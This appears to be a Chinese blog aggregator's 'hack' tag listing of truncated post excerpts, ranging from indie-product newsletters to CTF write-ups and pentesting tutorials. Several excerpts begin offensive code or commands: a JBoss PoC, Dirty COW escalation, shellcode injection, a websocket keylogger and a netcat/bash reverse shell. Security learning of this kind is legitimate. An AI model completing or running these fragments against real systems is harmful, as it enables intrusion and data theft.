hack

独立产品灵感周刊 DecoHack #031 - 用 AI 给黑白照片上色哪家好?

本周刊记录有趣好玩的独立产品设计开发相关内容,每周发布,往期内容同样精彩,感兴趣的伙伴可以点击订阅我的周刊。为保证每期都能收到,建议邮件订阅。欢迎通过Twitter私信推荐或投稿。产品推荐palette.fm-免费的AI滤镜给黑白照片上色的工具,这类APP已经火了很多年了,现在还能在Instagram上看到类似APP的广告,是一个很好的买量点。这个网站由开发者@EmilWallner制作。另外关注
·2022-09-19 17:24

go hack(十三)jboss poc

go网络安全代码地址jboss漏洞pocpackagemain//poc测试import("bytes""crypto/tls""encoding/hex""flag""fmt""log""net/http")funcjboss(hoststring,sslbool,cmdstring)(int,error){serializedObject,err:=hex.DecodeString("ACED
·2022-09-19 17:23

go hack(十二) pcap包解析

go网络安全代码地址packagemainimport("bufio""flag""fmt""log""os""text/tabwriter""github.com/miekg/dns")//遍历字典,枚举子域,并且查询子域名的a记录和cname记录//使用gorunsubdomain_gusee.go-domain="xxx.xx"-wordlist="xx"-c=10-dns="8.8.8.8
·2022-09-18 15:53

go hack(十八)go 对PE文件解析

go网络安全代码地址使用debug/pe标准库进行解析使用Reader对象对PE文件内容进行解析PE文件结构DOSheader包含签名(0x5a4d)peheader(0x3c指向0x500x450x000x00)dosstubcofffileheaderoptionalheadersectiontable//pe头typeFileHeaderstruct{Machineuint16NumberO
·2022-09-17 17:46

go hack(十七)go实现win进程注入shellcode

go网络安全代码地址使用syscall可以加载驻留内存的恶意软件或者钩子函数c++和go类型c++gobooleanbyteboolint32bytebytedworduint32dword32uint32dword64uint46worduint16handleuintptrlpvoiduintptrsize_tuintptrlpcvoiduintptrhmoduleuintptrlpcstru
·2022-09-16 22:51

[网鼎杯 2018]Comment

文件泄露一个留言板,以为是xss,发帖尝试,需要登录提示了用户名和密码,密码后三位需要爆破爆破出后三位为666登录后在console中发现提示提示GIT,想到git源码泄漏用dirmap扫出来了,下载后用githack
pakho_C·2022-09-15 15:42

手把手教你安装黑苹果之openCore-0.6.3 EFI制作全过程,非常详细

二、获取EFI1.Hackintosh黑苹果长期维护机型整理清单2.搜索efi二、自制EFI1.OCGen-X图形化一键自动生成EFI(推荐)2.手动下载EFI所需要的文件下载哪些文件下载opencore
ITKEY_·2022-09-15 13:32

go hack(十四) dirty cow 提权

go网络安全代码地址packagemainimport("bytes""fmt""log""os""syscall""time")//脏牛提权var(signales=make(chanbool)//协程控制mmapuintptr//https://blog.csdn.net/hello_ufo/article/details/86713947uintptr)constSuidBinary="/u
·2022-09-14 21:42

go hack(十)dns服务器构建

go网络安全代码地址packagemainimport("log""net""github.com/miekg/dns")//构建a记录查询的dns服务器//[email protected]测试systemctlstopsystemd-resolved.service停止原有的dns服务,解决53端口占用问题funcmain(){dns.HandleFunc(".",func(wdns
·2022-09-14 20:11

hacksudo-Thor(Vulnhub)

靶机地址:hacksudo:Thor~VulnHub目录利用的技术什么是破壳漏洞?
ProofM·2022-09-14 14:03

独立产品灵感周刊 DecoHack #030 - iOS16正式发布

上周中秋节,周刊顺延到周二发布,本周刊记录有趣好玩的独立产品设计开发相关内容,每周发布,感兴趣的伙伴可以点击订阅我的周刊。为保证每期都能收到,建议邮件订阅。欢迎通过Twitter私信推荐或投稿。产品推荐Stippl-这是一个旅行计划工具,之前一直在找类似的产品,这个产品做的就非常好,从工具入手,支持分享给好友,界面交互也非常友好。之前调研过,国内的各大旅行APP感觉体验做的都不是很好,可以同步本平
·2022-09-13 17:30

Go对Python产生的冲击

作者|yuliao来源|懒编程(ID:hackpython)Go的流行让以Python为主流语言的开发者(比如我)产生了一定的危机感。
AI科技大本营·2022-09-13 10:17

go hack(九)dns子域枚举

go网络安全代码地址packagemainimport("bufio""flag""fmt""log""os""text/tabwriter""github.com/miekg/dns")//遍历字典,枚举子域,并且查询子域名的a记录和cname记录//使用gorunsubdomain_gusee.go-domain="xxx.xx"-wordlist="xx"-c=10-dns="8.8.8.8
·2022-09-12 21:10

CSS Grid Layout(网格布局)

CSS有一些属性经常被用来解决布局问题:如(浮动float、定位postion)这些比较hack的方法经常会给页面遗留下一些问题。
·2022-09-12 14:56

go hack(七)websocket建立键盘记录器

go网络安全代码地址使用websocket实现一个键盘记录器前端请求k.js我们把logger.js返回给前端,需要第三方包gogetgithub.com/gorilla/websocketpackagemainimport("net/http""os""time"log"github.com/Sirupsen/logrus""github.com/gorilla/mux")//钓鱼信息记录到日志
·2022-09-11 18:05

[ 工具篇 ] 谷歌安装 hackbar (超级详细)

目录博主介绍一、安装hackbar1.下载压缩包2.选择一个版本3.点击链接4.修改harkbar-panel.js文件5
_PowerShell·2022-09-11 14:09

以太Ethernaut靶场打靶—6 Delegation

delegatecall函数的不严谨使用导致可以调用其他函数获取合约所有权可参考https://blog.openzeppelin.com/on-the-parity-wallet-multisig-hack
小王先森&·2022-09-08 01:02

网络安全——Goolge Hacking的使用

一、什么是GoolgeHacking使用Goolge搜索引擎或其他Goolge应用程序、搜索引擎,通过特定的语法来查找网站中的配置或代码中的漏洞,搜索登录后台、特定文件、漏洞页面、错误信息等二、逻辑运算符
賺钱娶甜甜·2022-09-07 09:50

go hack(五)使用go rpc和metasploit联动

go网络安全代码地址准备工作开启metasploit的rpc通信kali中msfconsole进入交互模式loadmsgrpcPass=123Serverhost=0.0.0.0开启rpcmetasploit使用messagePack进行通信,gogetgopkg.in/vmihailenco/msgpack.v2使用第三方的messagepack包基础知识metaploitapiflag\`ms
·2022-09-06 22:17

渗透测试-信息收集

目录子公司信息收集:域名信息收集:子域名信息收集:googlehacking:githubhacking:fofa工程师:邮箱信息收集:历史漏洞信息收集:应用信息收集:指纹信息收集:端口信息收集:waf
小韩韩啊·2022-09-06 17:20

metasploit渗透测试学习(一):信息搜集

文章目录一、GoogleHacking1、搜索网站目录结构2、检索特定文件类型3、搜索网站的email地址4、搜索网站登录页面二、活跃主机扫描1、metasploit的主机发现模块2、nmap扫描三、端口扫描
adureychloe·2022-09-06 06:04

云HSM可以让企业的安全工作事半功倍

专家DaveShackelford在这里介绍了支持和反对使用云HSM的两种声音。SoftLayer于近期发布了一款名为CloudHSM的产品,这是一个用于在云中确保密钥安全管理的工具。
weixin_34238642·2022-09-05 16:34

【IT基础】那些年,我们迷恋的cmd命令(一)

小续还记得,那些年玩hack的朋友吗,现在玩这个的,基本都是小孩子了(俗称脚本小子)。还记得,那些年敲过的命令吗,现在的孩子,都用工具了(叫工具党)。孩子们,健康的网络环境需要大家一起去维护。
weixin_33806509·2022-09-05 16:04

[ISCC 2021]部分wp

文章目录海市蜃楼-1Retrievethepasscode我的折扣是多少小明的表情包HacktheVictim美人计李华的红包小明的宠物兔ISCC客服冲冲冲(一)这是啥Web01登录tornadowhichisthetrueisccISCC
huamanggg·2022-09-05 16:51

ISCC 2021—WP(部分)

文章目录1.擂台-web-tornado2.擂台-misc-小明的表情包3.练武-misc-HacktheVictim4.练武-web-ISCC客服冲冲冲(一)5.练武-web-这是啥6.练武-web-Web01
一aue·2022-09-05 16:19

CTF新手,请问从本地访问flag!

强大,但麻烦,有点慢)抓包加上下面一句话X-Forwarded-For:127.0.0.1(或者client-ip:127.0.0.1,不同题不一样)ip(简单快捷)3.header(个性化定制头)4.hackbar
你们这样一点都不可耐·2022-09-05 07:09

逆向工程实验——pre8(密码分析、RSA和AES混合加密方案)

实验目录1.阅读2.阅读3.CryptanalysisHackingPuzzles(1)CryptanalysisHackingPuzzles—Part1(2)CryptanalysisHackingPuzzles—Part24
大灬白·2022-09-03 11:08

python底层与机器底层关系_起底 Python 的底层逻辑

文|图灵社区推荐|编程派公众号(ID:codingpy)01一次纯粹的hackingPython的作者,GuidovonRossum,荷兰人。
weixin_39664431·2022-09-02 17:09

反弹shell方法

准备:hacker:192.168.188.63(kali)目标:192.168.72.130(ubuntu)kali监听指定端口:nc-lvp1234反弹shell:ubuntu下方法一bash:bash-i
s0mor·2022-09-02 17:34

CodeForBetter_Hackathon,唤醒代码的力量

黑客马拉松(Hackathon)最初诞生于1999年,由黑客(hack)和马拉松(marathon)两个单词合并而成。
·2022-09-01 12:45

外国程序员求助:快 40 了,不知道以后该怎么办

转自:HackerNews,编译:36氪-VivianWang链接:http://36kr.com/p/5133609.htmlHackerNews上的朋友大家好!
程序员编程指南·2022-08-31 07:28

C++ 数列游戏

个人简介大家好,我是2022年3月份新人榜排名第三的༺Blog༒Hacker༻支持我:点赞+收藏⭐️+留言格言:༺永做优质༒programmer༻系列专栏:CF&UVA个人主页:༺Blog༒Hacker
༺Blog༒Hacker༻(山子轩)·2022-08-30 12:30

独立产品灵感周刊 DecoHack #028 - 如何给你的项目取一个好名字

本周刊记录有趣好玩的独立产品设计开发相关内容,每周发布,感兴趣的伙伴可以点击订阅我的周刊。为保证每期都能收到,建议邮件订阅。欢迎通过Twitter私信推荐或投稿。产品推荐Napkin-这是一个白板笔记管理工具,还在内测,没有开放测试,设计风格很独特,产品也做的很有想法。坐等公测。Focustask-这是一个待办事项管理工具,最近开放了公测,可以试试看,目前只有Web端,后续会推出桌面和移动端。Sa
·2022-08-29 14:10

对Github指定类目的内容进行监控和推送

很久之前看到HACK学习呀有一个Github安全搬运工的系列文章,个人觉得很不错,想要在自己的公众号上也做这方面的内容,内容的编辑排版相对来说比较容易,这样问题就回归到Github安全内容的获取上这篇文章整体比较长
春告鳥·2022-08-27 20:00

SRC挖掘密码重置漏洞总结

零基础学黑客,搜索公众号:白帽子左一前言最近一直在看国外众测的文章,偶尔也逛逛hackerone,发现公布的漏洞中存有不少的逻辑漏洞,毕竟在hackerone上提交漏洞过审之后给的是美元,还是很有诱惑力的
zkzq·2022-08-27 09:03

视觉资料整理

:项目:自动驾驶:论文写作:代码:选机文章类:笔试面试:视觉资料整理工作要求,技术分享:深度学习CV算法工程师从入门到初级面试有多远,大概是25篇文章的距离https://blog.csdn.net/hacker_long
毅博明喆·2022-08-27 00:02

区块链合约安全系列(四):如何认识及预防公链合约中的算术溢出攻击

id:BSN_2021公众号:BSN研习社作者:红枣科技张雪良背景:由于公链环境下所有的信息都是共享的,智能合约相当于是完全透明化,任何人都可以调用,外加一些利益的驱动,导致引发了很多hacker的攻击
·2022-08-26 18:53

前端网络安全

两个角度看web安全假如你是一个hacker——攻击XSS的一些特点-通常难以从UI,上感知(暗地执行脚本)-窃取用户信息(cookie/token)-绘制UI(例如弹窗),诱骗用户点击/填写表单StoredXSS
门卫老大爷·2022-08-26 10:22

Python 霸榜、C# 升温 ,揭晓 IEEE Spectrum 2021年度编程语言排行榜!

日前,IEEESpectrum在分析CareerBuilder、GitHub、Google、HackerNews、IEEE、Reddit、StackOverfl
苏小宓·2022-08-26 09:10

基于python的活体检测张嘴微笑眨眼检测)

目前越来越多的应用场景应用到人脸识别技术,通过人脸比对来进行人员身份认证,但是hack通过拿他人的身份证件也能冲破人脸系统的限制,造成安全隐患。
babyai996·2022-08-25 10:09

[网鼎杯 2018]Comment-1|SQL注入|二次注入

,并没有什么提示,显示界面如下:2、那先扫描一下目录,同时随便留言一个测试以下,但是显示需要登录,账户、密码给出了部分提示,但是最后三位密码需要爆破,结果如下:3、扫描到了.git文件,那就使用githack
upfine·2022-08-25 09:00

[网鼎杯 2018]Comment-1|SQL注入|二次注入

,并没有什么提示,显示界面如下:2、那先扫描一下目录,同时随便留言一个测试以下,但是显示需要登录,账户、密码给出了部分提示,但是最后三位密码需要爆破,结果如下:3、扫描到了.git文件,那就使用githack
upfine·2022-08-24 17:00

OPPOHack 2022 分赛区 9 月启动

OPPOHack2022初赛阶段报名火热进行中,9月,我们即将筛选优质个人及团队进入紧张激烈的北美分赛区赛事。敬请各位选手关注!
·2022-08-24 13:40

独立产品灵感周刊 DecoHack #027 - 今天的天气适合穿短裤

本周刊记录有趣好玩的独立产品设计开发相关内容,每周发布,感兴趣的伙伴可以点击订阅我的周刊。为保证每期都能收到,建议邮件订阅。欢迎通过Twitter私信推荐或投稿。产品推荐Stickerlife-这个网站收集了世界各地的好看的贴纸,每个贴纸都有发布的时间和背景故事,还可以下载高清的图片,很多好看的,真想拥有!死前必听的1001张专辑-这个网站每天都会通过邮件发送给你一张音乐专辑,你还可以查看这个专辑
·2022-08-22 13:22

[Hacker News 周报] 浏览器中运行 Postgres;与 Python 兼容的静态类型语言;分布式文件系统

https://www.bilibili.com/vide...本期时间轴:00:10Numpad|一个新式文本编辑器00:34Erg|与Python兼容的静态类型语言00:57分布式文件系统JuiceFS01:22JiraCLI|对Jira的命令行客户端01:33CrunchyData|在浏览器中运行Postgres01:53JSON5作者的一篇博客本期项目链接:https://numpad.i
·2022-08-21 15:05

别闲着了,快加入这场对抗疫情的战斗

文章转载自公众号DoraHacks(ID:dorahacks)By超神经内容导读:面对冠状病毒肺炎的不断蔓延,各位极客朋友们,是否也想要找个机会参与到对抗疫情的运动中,为战胜这场疫情做出一份努力。
HyperAI超神经·2022-08-19 05:13

代码谱写美好未来,2022 Code For Better_Hackathon 等你加入

疫情常态化时期,全球经济形势瞬息万变:传统企业加快数字化转型升级,“云”模式迅速抢占市场,软件产业受环境影响做出调整改变……面对后疫情时代下层出不穷的挑战与机遇,当今开发者比以往任何时候都更需要关注和了解技术的趋势,更需要持续学习和成长,以创新的产品和服务,为社会创造更多价值。中国开发者同样在疫情的影响下积极寻求改变与成长。每五位开发者中,便有一位来自于中国。作为开发者群体中的重要部分,中国开发者
·2022-08-18 14:42

[BJDCTF2020]Mark loves cat-1|源代码泄露|变量覆盖

变量覆盖共展示了三种获取flag的方式1、打开题目查看未发现有效信息,查看源代码信息,发现返回的dog信息,结果如下:2、使用dirmap进行目录扫描,发现了.git/config,那就想到了源代码泄露的问题,使用githack
upfine·2022-08-17 09:00

[BJDCTF2020]Mark loves cat-1|源代码泄露|变量覆盖

变量覆盖共展示了三种获取flag的方式1、打开题目查看未发现有效信息,查看源代码信息,发现返回的dog信息,结果如下:2、使用dirmap进行目录扫描,发现了.git/config,那就想到了源代码泄露的问题,使用githack
upfine·2022-08-16 17:00

独立产品灵感周刊 DecoHack #026 - 在哪里推广你的新产品

本周刊记录有趣好玩的独立产品设计开发相关内容,每周发布,感兴趣的伙伴可以点击订阅我的周刊。为保证每期都能收到,建议邮件订阅。欢迎通过Twitter私信推荐或投稿。产品推荐1.Typedrummer-打一段文字,这个网站就可以制作出来循环的鼓节拍音乐。每个字符都代表不同的声音。可以玩一下很有意思。Cinetimes-这是一个免费电影的导航索引网站,可以看到Youtube、Vimeo等网站上免费的电影
·2022-08-15 10:49
上一页 46 47 48 49 50 51 52 53 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他